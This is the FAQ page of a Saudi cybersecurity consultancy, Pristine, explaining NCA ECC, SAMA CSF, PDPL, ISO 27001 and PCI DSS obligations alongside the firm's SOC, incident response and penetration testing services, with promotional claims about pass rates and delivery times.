Frequently Asked Questions · Cybersecurity & Compliance · Saudi Arabia
Questions Answered. Clearly.
Answers to the most common questions about Saudi cybersecurity regulations, our services, compliance frameworks, and how to work with Pristine. Can't find what you need? Contact our team directly.
Saudi organisations face multiple cybersecurity regulatory obligations depending on their sector and ownership: (1) NCA ECC-2:2024 — mandatory for all government entities, CNI operators, and NCA-regulated organisations; covers 4 domains and 110 controls. (2) SAMA CSF — mandatory for all SAMA-licensed financial institutions including banks, fintechs, insurance, and payment service providers. (3) Saudi PDPL — mandatory for all organisations collecting or processing Saudi personal data, regardless of location. (4) PCI DSS — mandatory for organisations accepting credit card or Mada payments. (5) NCA CCC — mandatory for organisations using cloud services alongside NCA ECC. Most Saudi organisations must comply with several simultaneously — Pristine delivers them all from an integrated programme.
Yes — NCA ECC-2:2024 (published October 2024) introduced significant changes from ECC-1:2018: (1) Restructured from 5 to 4 domains with new subdomain organisation; (2) New Saudi-national staffing requirement — all cybersecurity roles must be filled by Saudi nationals; (3) New sub-controls for AI cybersecurity, IoT security, and enhanced cloud security; (4) Updated incident response timeline requirements; (5) Expanded third-party risk management requirements. The transition deadline has passed — organisations still operating on ECC-1 controls are non-compliant. Pristine has ECC-2:2024 methodology and Arabic policy libraries ready for immediate deployment.
No — SAMA CSF and NCA ECC are separate mandatory obligations that both apply to SAMA-supervised financial institutions. They are not alternatives. SAMA CSF governs financial sector cybersecurity and is enforced by the Saudi Central Bank. NCA ECC governs national cybersecurity and is enforced by the National Cybersecurity Authority. The two frameworks have significant overlap (60-70% of controls are shared), which is why Pristine delivers them from a single integrated programme — satisfying both frameworks with shared evidence, dramatically reducing cost and effort compared to separate compliance projects.
Saudi PDPL has extraterritorial scope — it applies to any organisation that collects or processes personal data about individuals residing in Saudi Arabia, regardless of where that organisation is based. This means: international e-commerce platforms selling to Saudi customers; multinational corporations with Saudi employees; foreign organisations providing services to Saudi residents; and Saudi subsidiaries of international groups. If your organisation processes data about Saudi residents in any context, PDPL applies. Pristine advises on the specific obligations for your processing activities during the initial free assessment.
NCA enforcement actions for non-compliance include: formal findings requiring mandatory remediation within defined timelines; increased supervisory scrutiny and more frequent audits; financial penalties for persistent non-compliance; operational restrictions affecting eligibility for government contracts and licences; and in serious cases, escalation to criminal prosecution. For SAMA-supervised financial institutions, SAMA enforcement adds further consequences including examination adverse findings, product launch restrictions, and licence implications. If you have received NCA or SAMA findings, Pristine specialises in rapid post-audit remediation — contact us urgently.
🛡️ Pristine's Security Services
Pristine's Security Services
SOC monitoring is a detection and response capability — Pristine's Riyadh-based analysts monitor your existing security tooling 24/7 for threats and incidents. MSSP (Managed Security Services Provider) is broader — it includes deploying, managing, and operating all your security technology (EDR, firewall, email security, WAF, vulnerability management) plus the SOC monitoring layer. MSSP clients automatically include SOC monitoring. If you already have security technology deployed and just need monitoring, SOC monitoring is appropriate. If you need a comprehensive outsourced security function including technology management, MSSP is more suitable.
For emergency incidents, call our 24/7 hotline at +966 549983377 — an IR Commander is engaged within 15 minutes. Remote triage and containment begins immediately. For retainer clients with pre-approved access, on-site deployment in Riyadh is guaranteed within 2 hours. For non-retainer emergency engagements, on-site deployment is typically 3-4 hours. GCC-wide (Dubai, Bahrain, Doha) on-site deployment is achievable within 8 hours. We recommend the IR Retainer programme for organisations in high-risk sectors — banking, energy, and government — to guarantee the fastest possible response.
Yes — Pristine's penetration testing practice covers IT, web application, cloud, mobile, API, and OT/ICS environments. Our IT and web application testing is conducted by OSCP, OSCE3, and CREST-certified ethical hackers. Our OT penetration testing uses exclusively passive, non-intrusive techniques — we never inject traffic or communicate with PLCs, DCS, or SCADA systems in production environments. Zero production impact is a contractual guarantee for all OT engagements. We have specific experience in Saudi energy, petrochemical, and industrial environments.
Pristine's SOC platform automatically collects and formats compliance evidence for all applicable frameworks throughout every client engagement: NCA ECC Domain 3 (Cybersecurity Resilience) sub-controls including event logging, monitoring, threat intelligence, and incident management; SAMA Domain 3 sub-controls for security event management and incident response; ISO 27001 Clause 9 performance evaluation evidence; PCI DSS Requirements 10 and 11 log monitoring and testing evidence. Monthly compliance reports consolidate this evidence into pre-formatted NCA and SAMA submission packages — reducing annual audit preparation from months of manual effort to hours.
Yes — knowledge transfer is a core element of Pristine's engagement philosophy. We don't create dependency — we build your team's capability. Training is available as a standalone service through Pristine Training Academy (CISEH, CPTE, CCEI, ISO 27001, DPO programmes) and as integrated components of all major service engagements. All training is available in Arabic and English. We also run embedded Security Champions programmes for development teams, executive security awareness sessions for boards, and customised SOC analyst training for organisations building internal security capability.
🇸🇦 NCA ECC Compliance
NCA ECC Compliance
For organisations with a moderate compliance gap, Pristine targets full audit-ready NCA ECC-2:2024 compliance within 6-8 weeks. Organisations with minimal existing security controls may require 12-16 weeks. Our 2-week rapid gap assessment produces a precise timeline with a fixed delivery commitment before implementation begins. Emergency deliveries (2-4 weeks for organisations with imminent audit deadlines) are available. Pristine's proprietary NCA ECC methodology — built over 15 years of Saudi government engagement — is the fastest compliant delivery approach in the Saudi market.
NCA ECC-2:2024 requires that all defined cybersecurity roles within government entities and NCA-supervised organisations are filled by Saudi nationals. This applies to roles defined under the NCA cybersecurity career framework — CISO, cybersecurity managers, SOC analysts, and other designated security positions. This means organisations cannot use entirely foreign-national cybersecurity teams for compliance purposes. Pristine's government practice team is composed entirely of Saudi nationals — satisfying this requirement for all government engagements. For other organisations, Pristine advises on Saudisation planning as part of the compliance programme.
NCA ECC applies directly to all Saudi government entities, CNI operators, and their supply chains. For private sector organisations, applicability depends on their designation and regulatory relationships. Private sector organisations in regulated sectors (telecommunications, financial services, healthcare, energy) may have NCA ECC obligations through sector-specific regulatory requirements. Additionally, many private sector organisations that supply services to government entities face NCA ECC contractual requirements. Pristine conducts a regulatory scope assessment in the initial engagement to determine exactly which NCA requirements apply to your organisation.
Yes — NCA CCC (Cloud Cybersecurity Controls) is a separate NCA standard from NCA ECC, published for organisations using or providing cloud services in Saudi Arabia. CCC-2:2024 applies to Cloud Service Tenants (CSTs — organisations using cloud services) and Cloud Service Providers (CSPs — organisations offering cloud services). If your organisation uses cloud services and is subject to NCA ECC, you must also comply with NCA CCC. Pristine delivers both NCA ECC and NCA CCC from a single integrated programme — both standards share significant control overlap which our methodology satisfies simultaneously.
🏦 SAMA Cybersecurity Framework
SAMA Cybersecurity Framework
Maturity Level 3 (Defined) is the minimum requirement for all SAMA-supervised financial institutions. Banks must achieve Level 4 (Quantitatively Managed) — all Saudi commercial banks were required to submit board-approved Level 4 roadmaps to SAMA. Level 3 requires formally documented and consistently implemented controls. Level 4 requires quantitative measurement, KPI tracking, and benchmarking. Below Level 3 constitutes non-compliance and will result in formal regulatory action during supervisory examination. Pristine delivers Level 3 baseline for non-bank SAMA members and Level 4 for Saudi commercial banks — in 12 weeks.
SAMA conducts supervisory examinations at frequency determined by institution size, complexity, and risk profile. Larger commercial banks typically face annual examination. Smaller institutions and fintechs may be examined less frequently — but all institutions must submit annual self-assessments regardless of examination schedule. Pristine prepared clients for SAMA examination with 100% pass rate across all engagements.
SAMA enforcement actions for examination failures include: formal adverse findings requiring mandatory remediation within defined timelines; increased supervisory monitoring and more frequent examinations; restrictions on new product launches and business expansion pending remediation; financial penalties for persistent non-compliance; and in serious cases, restrictions on operating licences. If you have received adverse SAMA findings, contact Pristine immediately — we specialise in rapid post-examination remediation and have a 100% record of resolving all SAMA findings within regulatory timelines.
⚖️ Saudi PDPL & Privacy
Saudi PDPL & Privacy
Saudi PDPL came into force in September 2023. Enforcement has been active since that date — there is no further grace period. SDAIA has been actively investigating complaints and conducting audits since enforcement commenced. If your organisation has not yet implemented a PDPL compliance programme, you are operating in breach of Saudi law and are exposed to penalties of up to SAR 5 million, criminal liability for deliberate violations, and reputational damage from enforcement actions. Pristine recommends treating PDPL compliance as urgent — our Foundation programme can be deployed in 2 weeks.
PDPL implementing regulations require specific categories of organisations to designate a privacy officer (DPO equivalent) — including organisations processing large volumes of personal data, organisations processing sensitive personal data (health, financial, biometric), and organisations for which data processing is a core activity. Many Saudi businesses, banks, healthcare providers, and technology companies have DPO designation obligations. Pristine's PDPL gap assessment determines whether your organisation requires a DPO. For organisations that do, Pristine offers a Virtual DPO service — an experienced Saudi privacy professional serving as your DPO on a retained basis at a fraction of the cost of a full-time hire.
Saudi PDPL Article 17 restricts cross-border transfer of Saudi personal data. Transfers are only permitted where: the destination country has an adequate level of personal data protection recognised by SDAIA; appropriate safeguards are in place (contractual clauses or binding corporate rules); or specific exceptions apply (vital interests, legal proceedings, consent). For international cloud services (AWS, Azure, GCP), Pristine maps which data processing is occurring in which region and implements the appropriate transfer mechanisms. Saudi organisations using international group data centres or global SaaS platforms must specifically assess and address cross-border transfer compliance.
🏅 ISO 27001 & ISO 27701
ISO 27001 & ISO 27701
For organisations with a moderate compliance gap, Pristine targets 20-24 weeks from gap assessment to certification award. Organisations with stronger existing controls can achieve certification in 14-16 weeks. Large or highly complex organisations may require 28-36 weeks. Pristine's proprietary ISO 27001 methodology has achieved a 99% first-attempt certification rate across all engagements. Adding ISO 27701 concurrently adds only 3-5 weeks compared to 12-18 weeks for sequential delivery — we recommend concurrent implementation for organisations with PDPL obligations.
Partially — ISO 27001 Annex A and NCA ECC-2:2024 sub-controls have approximately 80-85% overlap. Achieving ISO 27001 does not automatically satisfy NCA ECC — a formal NCA gap assessment against all 110 sub-controls is still required, and several NCA ECC requirements (Saudi-national staffing, NCA-specific incident notification procedures, Arabic policy requirements) have no ISO 27001 equivalent. However, Pristine maps every ISO 27001 Annex A control to NCA ECC sub-controls as a standard deliverable — meaning ISO implementation produces approximately 80-85% of NCA ECC evidence simultaneously. Pristine typically delivers ISO 27001 and NCA ECC from a single integrated programme.
💳 PCI DSS
PCI DSS
SAQ type depends on how you process card payments: SAQ-A applies if you use a fully redirect-only or hosted payment page and never handle card data — customers are completely redirected to a third-party payment page and you have no access to card data. SAQ-A-EP applies if your website partially manages the payment experience even though you outsource actual card processing. SAQ-D is required for all other merchants and all service providers. Many Saudi e-commerce platforms are incorrectly self-assessing as SAQ-D when they qualify for SAQ-A — resulting in years of unnecessary compliance cost. Pristine's free PCI scoping call determines the correct assessment type for your specific payment integration.
PCI DSS v4.0 (fully effective March 2025) introduced several significant new requirements: (1) Script integrity (Req 6.4.3) — all scripts on payment pages must be inventoried, authorised, and integrity-verified. This requirement specifically targets Magecart e-skimming attacks against Saudi checkout pages; (2) Expanded MFA (Req 8.4) — MFA now required for ALL access into the CDE, not just remote access; (3) Targeted Risk Analysis (TRA) — replacing fixed timelines for many periodic activities with risk-based determination; (4) Automated log review (Req 10.7) — automated mechanisms required for log review. Organisations still operating to v3.2.1 controls are non-compliant.
🤝 Working With Pristine
Working With Pristine
Pristine engagements are scoped and fixed-priced before commencement — no open-ended billing or time-and-materials surprises. After the free initial assessment, Pristine proposes a defined scope of work with a fixed total cost, delivery timeline, and clear outcome commitments. For ongoing services (SOC monitoring, MSSP, compliance retainers), pricing is structured as monthly subscriptions with transparent per-user or per-asset pricing bands. Pristine never starts work before pricing is agreed. Contact us for indicative pricing — the free assessment often identifies scope reduction opportunities that significantly lower the cost of compliance or security services.
Pristine works fluently in both Arabic and English — clients can communicate, receive deliverables, and engage with our team entirely in Arabic if preferred. Our Arabic-native consultants write all compliance documentation, policies, and board presentations in Arabic as the primary language — not translations from English. This is a significant differentiator for Saudi government and regulatory engagements where Arabic-language documentation quality is evaluated by examiners. For international clients or engagements requiring English, all deliverables are provided in English. For most Saudi clients, we deliver bilingual Arabic and English packages simultaneously.
All Pristine engagements are conducted under formal NDA before any access to client systems, data, or documentation. Our penetration testing and security assessment teams operate under strict data handling procedures — all client data processed within Saudi Arabia, no cross-border transfer, and post-engagement data deletion procedures with written confirmation. For government and classified environment engagements, Pristine follows Saudi government information security classification procedures. Pristine is PDPL-compliant for all personal data processed during client engagements — including any personal data encountered during penetration testing or DFIR investigations.
Yes — Pristine can arrange reference conversations with existing clients across relevant sectors for qualified procurement enquiries. Due to the sensitivity of cybersecurity engagements, references are arranged through our client success team with prior client consent rather than published publicly. Contact our sales team with your reference request and sector of interest — we will arrange an appropriate reference introduction within 48 hours. Our case studies (with client identity anonymised) are publicly available and cover outcomes across government, banking, energy, healthcare, telecom, and retail sectors.
Pristine has no minimum contract size — we work with organisations ranging from 50-person SMEs to 10,000+ person enterprises and government ministries. Engagement duration varies by service type: compliance gap assessments can be completed in 2 weeks; full NCA ECC programmes typically run 8-12 weeks; SOC monitoring and MSSP contracts are structured as annual subscriptions with monthly rolling terms thereafter. For urgent incident response, there is no minimum engagement — we engage on an emergency basis for incidents of any scale. Contact us to discuss your specific requirements.
💬
Still Have Questions?
Our team of Saudi cybersecurity specialists is available to answer any question — no matter how technical, regulatory-specific, or complex. No sales pressure, just genuine expert guidance.